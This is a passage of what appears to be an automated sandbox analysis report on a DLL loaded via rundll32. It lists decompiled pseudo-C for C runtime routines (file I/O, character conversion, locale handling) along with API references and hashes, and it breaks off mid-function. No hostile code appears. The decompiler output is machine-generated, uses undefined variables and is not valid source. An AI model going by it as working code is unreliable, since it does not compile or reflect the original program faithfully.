                                                                                                                                • SetLastError.KERNEL32(0000007F,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00000000), ref: 100042D7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Read$ErrorLast
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2715074504-0
                                                                                                                                • Opcode ID: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
                                                                                                                                • Instruction ID: efa1043a0b20c9ed80e11ee60e030ac585fb5041ac03c1c204f013357def7678
                                                                                                                                • Opcode Fuzzy Hash: b417d0638b75f135a4bc08a9313aee768ca7022b991b6e78e246613ce2e49123
                                                                                                                                • Instruction Fuzzy Hash: 8041AFB12007029BE300CF69EC84A57B3E8FF88794F028529F94587350EB31F919CBA5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 93%
                                                                                                                                			E100054A1(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, void* __eflags) {
                                                                                                                                				signed int _t52;
                                                                                                                                				void* _t54;
                                                                                                                                				void* _t58;
                                                                                                                                				intOrPtr _t61;
                                                                                                                                				signed int _t67;
                                                                                                                                				void* _t106;
                                                                                                                                				void* _t130;
                                                                                                                                
                                                                                                                                				_t123 = __edi;
                                                                                                                                				_t122 = __edx;
                                                                                                                                				_t95 = __ebx;
                                                                                                                                				_push(0x58);
                                                                                                                                				E10007B94(E100154E3, __ebx, __edi, __esi);
                                                                                                                                				_t129 = __ecx;
                                                                                                                                				if( *( *(__ecx + 0x20)) == 0 ||  *( *(__ecx + 0x20)) >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) +  *( *(__ecx + 0x20))) {
                                                                                                                                					_t52 =  *(_t129 + 0x4c);
                                                                                                                                					__eflags = _t52;
                                                                                                                                					if(_t52 != 0) {
                                                                                                                                						__eflags =  *(_t129 + 0x3c);
                                                                                                                                						if(__eflags != 0) {
                                                                                                                                							E100050D9(_t130 - 0x2c);
                                                                                                                                							 *(_t130 - 4) =  *(_t130 - 4) & 0x00000000;
                                                                                                                                							while(1) {
                                                                                                                                								_push( *(_t129 + 0x4c));
                                                                                                                                								_t54 = E10008952(_t95, _t122, _t123, _t129, __eflags);
                                                                                                                                								__eflags = _t54 - 0xffffffff;
                                                                                                                                								if(_t54 == 0xffffffff) {
                                                                                                                                									break;
                                                                                                                                								}
                                                                                                                                								E1000540E(_t54, _t130 - 0x2c, _t122, _t129, 1, _t54);
                                                                                                                                								_t58 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x44));
                                                                                                                                								_t95 = _t58;
                                                                                                                                								_t61 = E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x64));
                                                                                                                                								_t122 =  *( *(_t129 + 0x3c));
                                                                                                                                								 *((intOrPtr*)(_t130 - 0x38)) = _t61;
                                                                                                                                								_t123 =  *((intOrPtr*)(_t130 - 0x18)) + _t58;
                                                                                                                                								_t67 =  *((intOrPtr*)( *( *(_t129 + 0x3c)) + 0x10))(_t129 + 0x44,  *((intOrPtr*)(_t130 - 0x38)),  *((intOrPtr*)(_t130 - 0x18)) + _t58, _t130 - 0x34, _t130 - 0x2d, _t130 - 0x2c, _t130 - 0x3c);
                                                                                                                                								__eflags = _t67;
                                                                                                                                								if(_t67 < 0) {
                                                                                                                                									break;
                                                                                                                                								} else {
                                                                                                                                									_t123 = 1;
                                                                                                                                									__eflags = _t67 - 1;
                                                                                                                                									if(_t67 <= 1) {
                                                                                                                                										_t106 = _t130 - 0x2c;
                                                                                                                                										__eflags =  *((intOrPtr*)(_t130 - 0x3c)) - _t130 - 0x2d;
                                                                                                                                										if( *((intOrPtr*)(_t130 - 0x3c)) != _t130 - 0x2d) {
                                                                                                                                											_t123 =  *((intOrPtr*)(_t130 - 0x18)) -  *((intOrPtr*)(_t130 - 0x34)) + E10004AEE(E10005335(_t106, _t130 - 0x54));
                                                                                                                                											while(1) {
                                                                                                                                												__eflags = _t123;
                                                                                                                                												if(_t123 <= 0) {
                                                                                                                                													goto L23;
                                                                                                                                												}
                                                                                                                                												_push( *(_t129 + 0x4c));
                                                                                                                                												_t123 = _t123 - 1;
                                                                                                                                												__eflags = _t123;
                                                                                                                                												_push( *((char*)(_t123 +  *((intOrPtr*)(_t130 - 0x34)))));
                                                                                                                                												E10008C53(_t95, _t122, _t123, _t129, _t123);
                                                                                                                                											}
                                                                                                                                											goto L23;
                                                                                                                                										} else {
                                                                                                                                											__eflags =  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c));
                                                                                                                                											E10001270(_t130 - 0x2c, _t122, _t130, 0,  *((intOrPtr*)(_t130 - 0x34)) - E10004AEE(E10005335(_t106, _t130 - 0x5c)));
                                                                                                                                											continue;
                                                                                                                                										}
                                                                                                                                									} else {
                                                                                                                                										__eflags = _t67 - 3;
                                                                                                                                										if(_t67 != 3) {
                                                                                                                                											break;
                                                                                                                                										} else {
                                                                                                                                											__eflags =  *((intOrPtr*)(_t130 - 0x18)) - 1;
                                                                                                                                											if(__eflags < 0) {
                                                                                                                                												continue;
                                                                                                                                											} else {
                                                                                                                                												E100068D7(_t95, _t83, _t130 - 0x2d, 1, E10004AEE(E10005335(_t130 - 0x2c, _t130 - 0x4c)), 1);
                                                                                                                                												L23:
                                                                                                                                												_t129 =  *(_t130 - 0x2d) & 0x000000ff;
                                                                                                                                											}
                                                                                                                                										}
                                                                                                                                									}
                                                                                                                                								}
                                                                                                                                								L19:
                                                                                                                                								E10001220(_t130 - 0x2c, _t130, 1, 0);
                                                                                                                                								goto L3;
                                                                                                                                							}
                                                                                                                                							__eflags = _t129;
                                                                                                                                							goto L19;
                                                                                                                                						} else {
                                                                                                                                							_t52 = E1000511D(__eflags, _t130 - 0x2d, _t52);
                                                                                                                                							__eflags = _t52;
                                                                                                                                							if(_t52 == 0) {
                                                                                                                                								goto L5;
                                                                                                                                							} else {
                                                                                                                                							}
                                                                                                                                						}
                                                                                                                                					} else {
                                                                                                                                						L5:
                                                                                                                                					}
                                                                                                                                				} else {
                                                                                                                                					 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) - 1;
                                                                                                                                					_t129 =  *(__ecx + 0x20);
                                                                                                                                					 *( *(__ecx + 0x20)) =  *( *(__ecx + 0x20)) + 1;
                                                                                                                                				}
                                                                                                                                				L3:
                                                                                                                                				return E10007BDE(_t95, _t123, _t129);
                                                                                                                                			}











                                                                                                                                APIs
                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 100054A8
                                                                                                                                • _fgetc.LIBCMT ref: 100055DE
                                                                                                                                  • Part of subcall function 1000540E: std::_String_base::_Xlen.LIBCPMT ref: 10005424
                                                                                                                                • _memcpy_s.LIBCMT ref: 100055A3
                                                                                                                                • _ungetc.LIBCMT ref: 10005629
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: H_prolog3_String_base::_Xlen_fgetc_memcpy_s_ungetcstd::_
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 9762108-0
                                                                                                                                • Opcode ID: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
                                                                                                                                • Instruction ID: 5dbc0edad074bc516d1e3aa92765b13b845c281a9169638769e3243b87268825
                                                                                                                                • Opcode Fuzzy Hash: 4e5dfa554e32b8c66081f196d76509ceacc785a41fb5b784d226474a297008bd
                                                                                                                                • Instruction Fuzzy Hash: A751A2769005099FEB14CBB4C8559DFB3F9FF08392B60451AE551E7298EE32FA44CB60
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 91%
                                                                                                                                			E10008FA9(signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				void* __ebx;
                                                                                                                                				void* __edi;
                                                                                                                                				void* __esi;
                                                                                                                                				void* __ebp;
                                                                                                                                				signed int _t59;
                                                                                                                                				intOrPtr* _t61;
                                                                                                                                				signed int _t63;
                                                                                                                                				void* _t68;
                                                                                                                                				signed int _t69;
                                                                                                                                				signed int _t72;
                                                                                                                                				signed int _t74;
                                                                                                                                				signed int _t75;
                                                                                                                                				signed int _t77;
                                                                                                                                				signed int _t78;
                                                                                                                                				signed int _t81;
                                                                                                                                				signed int _t82;
                                                                                                                                				signed int _t84;
                                                                                                                                				signed int _t88;
                                                                                                                                				signed int _t97;
                                                                                                                                				signed int _t98;
                                                                                                                                				signed int _t99;
                                                                                                                                				intOrPtr* _t100;
                                                                                                                                				void* _t101;
                                                                                                                                
                                                                                                                                				_t90 = __edx;
                                                                                                                                				if(_a8 == 0 || _a12 == 0) {
                                                                                                                                					L4:
                                                                                                                                					return 0;
                                                                                                                                				} else {
                                                                                                                                					_t100 = _a16;
                                                                                                                                					_t105 = _t100;
                                                                                                                                					if(_t100 != 0) {
                                                                                                                                						_t82 = _a4;
                                                                                                                                						__eflags = _t82;
                                                                                                                                						if(__eflags == 0) {
                                                                                                                                							goto L3;
                                                                                                                                						}
                                                                                                                                						_t63 = _t59 | 0xffffffff;
                                                                                                                                						_t90 = _t63 % _a8;
                                                                                                                                						__eflags = _a12 - _t63 / _a8;
                                                                                                                                						if(__eflags > 0) {
                                                                                                                                							goto L3;
                                                                                                                                						}
                                                                                                                                						_t97 = _a8 * _a12;
                                                                                                                                						__eflags =  *(_t100 + 0xc) & 0x0000010c;
                                                                                                                                						_v8 = _t82;
                                                                                                                                						_v16 = _t97;
                                                                                                                                						_t81 = _t97;
                                                                                                                                						if(( *(_t100 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                							_v12 = 0x1000;
                                                                                                                                						} else {
                                                                                                                                							_v12 =  *(_t100 + 0x18);
                                                                                                                                						}
                                                                                                                                						__eflags = _t97;
                                                                                                                                						if(_t97 == 0) {
                                                                                                                                							L32:
                                                                                                                                							return _a12;
                                                                                                                                						} else {
                                                                                                                                							do {
                                                                                                                                								_t84 =  *(_t100 + 0xc) & 0x00000108;
                                                                                                                                								__eflags = _t84;
                                                                                                                                								if(_t84 == 0) {
                                                                                                                                									L18:
                                                                                                                                									__eflags = _t81 - _v12;
                                                                                                                                									if(_t81 < _v12) {
                                                                                                                                										_t68 = E1000E577(_t90, _t97,  *_v8, _t100);
                                                                                                                                										__eflags = _t68 - 0xffffffff;
                                                                                                                                										if(_t68 == 0xffffffff) {
                                                                                                                                											L34:
                                                                                                                                											_t69 = _t97;
                                                                                                                                											L35:
                                                                                                                                											return (_t69 - _t81) / _a8;
                                                                                                                                										}
                                                                                                                                										_v8 = _v8 + 1;
                                                                                                                                										_t72 =  *(_t100 + 0x18);
                                                                                                                                										_t81 = _t81 - 1;
                                                                                                                                										_v12 = _t72;
                                                                                                                                										__eflags = _t72;
                                                                                                                                										if(_t72 <= 0) {
                                                                                                                                											_v12 = 1;
                                                                                                                                										}
                                                                                                                                										goto L31;
                                                                                                                                									}
                                                                                                                                									__eflags = _t84;
                                                                                                                                									if(_t84 == 0) {
                                                                                                                                										L21:
                                                                                                                                										__eflags = _v12;
                                                                                                                                										_t98 = _t81;
                                                                                                                                										if(_v12 != 0) {
                                                                                                                                											_t75 = _t81;
                                                                                                                                											_t90 = _t75 % _v12;
                                                                                                                                											_t98 = _t98 - _t75 % _v12;
                                                                                                                                											__eflags = _t98;
                                                                                                                                										}
                                                                                                                                										_push(_t98);
                                                                                                                                										_push(_v8);
                                                                                                                                										_push(E1000E545(_t90, _t98, _t100));
                                                                                                                                										_t74 = E1000EE57(_t81, _t90, _t98, _t100, __eflags);
                                                                                                                                										_t101 = _t101 + 0xc;
                                                                                                                                										__eflags = _t74 - 0xffffffff;
                                                                                                                                										if(_t74 == 0xffffffff) {
                                                                                                                                											L36:
                                                                                                                                											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                											_t69 = _v16;
                                                                                                                                											goto L35;
                                                                                                                                										} else {
                                                                                                                                											_t88 = _t98;
                                                                                                                                											__eflags = _t74 - _t98;
                                                                                                                                											if(_t74 <= _t98) {
                                                                                                                                												_t88 = _t74;
                                                                                                                                											}
                                                                                                                                											_v8 = _v8 + _t88;
                                                                                                                                											_t81 = _t81 - _t88;
                                                                                                                                											__eflags = _t74 - _t98;
                                                                                                                                											if(_t74 < _t98) {
                                                                                                                                												goto L36;
                                                                                                                                											} else {
                                                                                                                                												L27:
                                                                                                                                												_t97 = _v16;
                                                                                                                                												goto L31;
                                                                                                                                											}
                                                                                                                                										}
                                                                                                                                									}
                                                                                                                                									_t77 = E10008CC5(_t90, _t100);
                                                                                                                                									__eflags = _t77;
                                                                                                                                									if(_t77 != 0) {
                                                                                                                                										goto L34;
                                                                                                                                									}
                                                                                                                                									goto L21;
                                                                                                                                								}
                                                                                                                                								_t78 =  *(_t100 + 4);
                                                                                                                                								__eflags = _t78;
                                                                                                                                								if(__eflags == 0) {
                                                                                                                                									goto L18;
                                                                                                                                								}
                                                                                                                                								if(__eflags < 0) {
                                                                                                                                									_t48 = _t100 + 0xc;
                                                                                                                                									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
                                                                                                                                									__eflags =  *_t48;
                                                                                                                                									goto L34;
                                                                                                                                								}
                                                                                                                                								_t99 = _t81;
                                                                                                                                								__eflags = _t81 - _t78;
                                                                                                                                								if(_t81 >= _t78) {
                                                                                                                                									_t99 = _t78;
                                                                                                                                								}
                                                                                                                                								E10006BF0(_t81, _t99, _t100,  *_t100, _v8, _t99);
                                                                                                                                								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
                                                                                                                                								 *_t100 =  *_t100 + _t99;
                                                                                                                                								_t101 = _t101 + 0xc;
                                                                                                                                								_t81 = _t81 - _t99;
                                                                                                                                								_v8 = _v8 + _t99;
                                                                                                                                								goto L27;
                                                                                                                                								L31:
                                                                                                                                								__eflags = _t81;
                                                                                                                                							} while (_t81 != 0);
                                                                                                                                							goto L32;
                                                                                                                                						}
                                                                                                                                					}
                                                                                                                                					L3:
                                                                                                                                					_t61 = E1000B02E(_t105);
                                                                                                                                					_push(0);
                                                                                                                                					_push(0);
                                                                                                                                					_push(0);
                                                                                                                                					_push(0);
                                                                                                                                					_push(0);
                                                                                                                                					 *_t61 = 0x16;
                                                                                                                                					E1000708C(_t90, 0, _t100);
                                                                                                                                					goto L4;
                                                                                                                                				}
                                                                                                                                			}





























                                                                                                                                0x100090e0
                                                                                                                                0x00000000
                                                                                                                                0x10009029
                                                                                                                                0x10009023
                                                                                                                                0x10008fc7
                                                                                                                                0x10008fc7
                                                                                                                                0x10008fcc
                                                                                                                                0x10008fcd
                                                                                                                                0x10008fce
                                                                                                                                0x10008fcf
                                                                                                                                0x10008fd0
                                                                                                                                0x10008fd1
                                                                                                                                0x10008fd7
                                                                                                                                0x00000000
                                                                                                                                0x10008fdc

                                                                                                                                APIs
                                                                                                                                • __flush.LIBCMT ref: 1000906D
                                                                                                                                • __fileno.LIBCMT ref: 1000908D
                                                                                                                                • __locking.LIBCMT ref: 10009094
                                                                                                                                • __flsbuf.LIBCMT ref: 100090BF
                                                                                                                                  • Part of subcall function 1000B02E: __getptd_noexit.LIBCMT ref: 1000B02E
                                                                                                                                  • Part of subcall function 1000708C: __decode_pointer.LIBCMT ref: 10007097
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3240763771-0
                                                                                                                                • Opcode ID: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
                                                                                                                                • Instruction ID: 23d6b4e30aa61f3eb1ca52232f0f9b5df6bc3795a971e9f133615fbef43ceba0
                                                                                                                                • Opcode Fuzzy Hash: 90c2df307816b9864583c0cfff05f289005b3de7282012ebd6b0bcd9c3d7a974
                                                                                                                                • Instruction Fuzzy Hash: 5541B331A006459FFB14CFA988845AFB7F6FF803E0F218529E8A597158D771EE41CB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E100136B5(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                				char _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				char _v20;
                                                                                                                                				char _t43;
                                                                                                                                				char _t46;
                                                                                                                                				signed int _t53;
                                                                                                                                				signed int _t54;
                                                                                                                                				intOrPtr _t56;
                                                                                                                                				int _t57;
                                                                                                                                				int _t58;
                                                                                                                                				signed short* _t59;
                                                                                                                                				short* _t60;
                                                                                                                                				int _t65;
                                                                                                                                				char* _t74;
                                                                                                                                
                                                                                                                                				_t74 = _a8;
                                                                                                                                				if(_t74 == 0 || _a12 == 0) {
                                                                                                                                					L5:
                                                                                                                                					return 0;
                                                                                                                                				} else {
                                                                                                                                					if( *_t74 != 0) {
                                                                                                                                						E10009442( &_v20, __edx, __edi, _a16);
                                                                                                                                						_t43 = _v20;
                                                                                                                                						__eflags =  *(_t43 + 0x14);
                                                                                                                                						if( *(_t43 + 0x14) != 0) {
                                                                                                                                							_t46 = E100137E6( *_t74 & 0x000000ff,  &_v20);
                                                                                                                                							__eflags = _t46;
                                                                                                                                							if(_t46 == 0) {
                                                                                                                                								__eflags = _a4;
                                                                                                                                								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                								if(__eflags != 0) {
                                                                                                                                									L10:
                                                                                                                                									__eflags = _v8;
                                                                                                                                									if(_v8 != 0) {
                                                                                                                                										_t53 = _v12;
                                                                                                                                										_t11 = _t53 + 0x70;
                                                                                                                                										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                                                                										__eflags =  *_t11;
                                                                                                                                									}
                                                                                                                                									return 1;
                                                                                                                                								}
                                                                                                                                								L21:
                                                                                                                                								_t54 = E1000B02E(__eflags);
                                                                                                                                								 *_t54 = 0x2a;
                                                                                                                                								__eflags = _v8;
                                                                                                                                								if(_v8 != 0) {
                                                                                                                                									_t54 = _v12;
                                                                                                                                									_t33 = _t54 + 0x70;
                                                                                                                                									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                                                                									__eflags =  *_t33;
                                                                                                                                								}
                                                                                                                                								return _t54 | 0xffffffff;
                                                                                                                                							}
                                                                                                                                							_t56 = _v20;
                                                                                                                                							_t65 =  *(_t56 + 0xac);
                                                                                                                                							__eflags = _t65 - 1;
                                                                                                                                							if(_t65 <= 1) {
                                                                                                                                								L17:
                                                                                                                                								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                                                                								if(__eflags < 0) {
                                                                                                                                									goto L21;
                                                                                                                                								}
                                                                                                                                								__eflags = _t74[1];
                                                                                                                                								if(__eflags == 0) {
                                                                                                                                									goto L21;
                                                                                                                                								}
                                                                                                                                								L19:
                                                                                                                                								_t57 =  *(_t56 + 0xac);
                                                                                                                                								__eflags = _v8;
                                                                                                                                								if(_v8 == 0) {
                                                                                                                                									return _t57;
                                                                                                                                								}
                                                                                                                                								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                                                                								return _t57;
                                                                                                                                							}
                                                                                                                                							__eflags = _a12 - _t65;
                                                                                                                                							if(_a12 < _t65) {
                                                                                                                                								goto L17;
                                                                                                                                							}
                                                                                                                                							__eflags = _a4;
                                                                                                                                							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                                                                							__eflags = _t58;
                                                                                                                                							_t56 = _v20;
                                                                                                                                							if(_t58 != 0) {
                                                                                                                                								goto L19;
                                                                                                                                							}
                                                                                                                                							goto L17;
                                                                                                                                						}
                                                                                                                                						_t59 = _a4;
                                                                                                                                						__eflags = _t59;
                                                                                                                                						if(_t59 != 0) {
                                                                                                                                							 *_t59 =  *_t74 & 0x000000ff;
                                                                                                                                						}
                                                                                                                                						goto L10;
                                                                                                                                					} else {
                                                                                                                                						_t60 = _a4;
                                                                                                                                						if(_t60 != 0) {
                                                                                                                                							 *_t60 = 0;
                                                                                                                                						}
                                                                                                                                						goto L5;
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                			}

















                                                                                                                                0x10013759
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x10013759
                                                                                                                                0x100136f6
                                                                                                                                0x100136f9
                                                                                                                                0x100136fb
                                                                                                                                0x10013701
                                                                                                                                0x10013701
                                                                                                                                0x00000000
                                                                                                                                0x100136d1
                                                                                                                                0x100136d1
                                                                                                                                0x100136d6
                                                                                                                                0x100136da
                                                                                                                                0x100136da
                                                                                                                                0x00000000
                                                                                                                                0x100136d6
                                                                                                                                0x100136cf

                                                                                                                                APIs
                                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 100136E9
                                                                                                                                • __isleadbyte_l.LIBCMT ref: 1001371D
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 1001374E
                                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 100137BC
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3058430110-0
                                                                                                                                • Opcode ID: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
                                                                                                                                • Instruction ID: fe590c44e70f2d795bb3872b418c13e2d21e5b7396ab7666b262f08f3a11fc7a
                                                                                                                                • Opcode Fuzzy Hash: d3c89b6fc4c9a062a63f27f63a21df55c94e1a7d2321eb3fceb2aa8cfa4a7bff
                                                                                                                                • Instruction Fuzzy Hash: 1731C1B1B08296EFDB20DFA4C8849AE7BE5EF01261F11C5A8E4A49F1D1E730DD80DB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 90%
                                                                                                                                			E1000A312(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                                                                				signed int _t13;
                                                                                                                                				intOrPtr _t28;
                                                                                                                                				void* _t29;
                                                                                                                                				void* _t30;
                                                                                                                                
                                                                                                                                				_t30 = __eflags;
                                                                                                                                				_t26 = __edi;
                                                                                                                                				_t25 = __edx;
                                                                                                                                				_t22 = __ebx;
                                                                                                                                				_push(0xc);
                                                                                                                                				_push(0x10019be8);
                                                                                                                                				E1000B078(__ebx, __edi, __esi);
                                                                                                                                				_t28 = E1000C3E3(__ebx, __edx, __edi, _t30);
                                                                                                                                				_t13 =  *0x1001bfd0; // 0xfffffffe
                                                                                                                                				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                                                                					L6:
                                                                                                                                					E1000BA3C(_t22, 0xc);
                                                                                                                                					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                                                                					_t8 = _t28 + 0x6c; // 0x6c
                                                                                                                                					_t26 =  *0x1001c0b8; // 0x4c42b20
                                                                                                                                					 *((intOrPtr*)(_t29 - 0x1c)) = E1000A2D4(_t8, _t26);
                                                                                                                                					 *(_t29 - 4) = 0xfffffffe;
                                                                                                                                					E1000A37C();
                                                                                                                                				} else {
                                                                                                                                					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                                                					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                                                                						goto L6;
                                                                                                                                					} else {
                                                                                                                                						_t28 =  *((intOrPtr*)(E1000C3E3(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                                                                					}
                                                                                                                                				}
                                                                                                                                				if(_t28 == 0) {
                                                                                                                                					E1000B5DD(_t25, _t26, 0x20);
                                                                                                                                				}
                                                                                                                                				return E1000B0BD(_t28);
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • __getptd.LIBCMT ref: 1000A31E
                                                                                                                                  • Part of subcall function 1000C3E3: __getptd_noexit.LIBCMT ref: 1000C3E6
                                                                                                                                  • Part of subcall function 1000C3E3: __amsg_exit.LIBCMT ref: 1000C3F3
                                                                                                                                • __getptd.LIBCMT ref: 1000A335
                                                                                                                                • __amsg_exit.LIBCMT ref: 1000A343
                                                                                                                                • __lock.LIBCMT ref: 1000A353
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.692503191.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                • Associated: 00000006.00000002.692489525.0000000010000000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692548110.0000000010016000.00000002.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692560187.000000001001B000.00000004.00020000.sdmp
                                                                                                                                • Associated: 00000006.00000002.692569712.000000001001F000.00000002.00020000.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3521780317-0
                                                                                                                                • Opcode ID: c0ebd1d46576063a12af14f4010ed9d9819538088b517b8c681bfaaf82e776c5
                                                                                                                                • Instruction ID: b1e1f08a56a87501fea7a796c9ae050b36c141db5c66e4cda01b9002c6fe19d4
                                                                                                                                • Opcode Fuzzy Hash: c0ebd1d46576063a12af14f4010ed9d9819538088b517b8c681bfaaf82e776c5
                                                                                                                                • Instruction Fuzzy Hash: A8F03639D44B14CAF750EB758842B4D72E0EB057D0F118359F450972DACB74BB81DB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 89%
                                                                                                                                			E10008086(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                                                                                                                                				intOrPtr _t17;
                                                                                                                                				intOrPtr* _t28;
                                                                                                                                				void* _t29;
                                                                                                                                
                                                                                                                                				_t30 = __eflags;
                                                                                                                                				_t28 = __esi;
                                                                                                                                				_t27 = __edi;
                                                                                                                                				_t26 = __edx;
                                                                                                                                				_t19 = __ebx;
                                                                                                                                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                                                                                                                                				E10007476(__ebx, __edx, __edi, __esi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                                                                                                                                				 *((intOrPtr*)(E1000C3E3(__ebx, __edx, __edi, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                                                                                                                                				_t17 = E1000C3E3(_t19, _t26, _t27, _t30);
                                                                                                                                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                                                                                                                                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
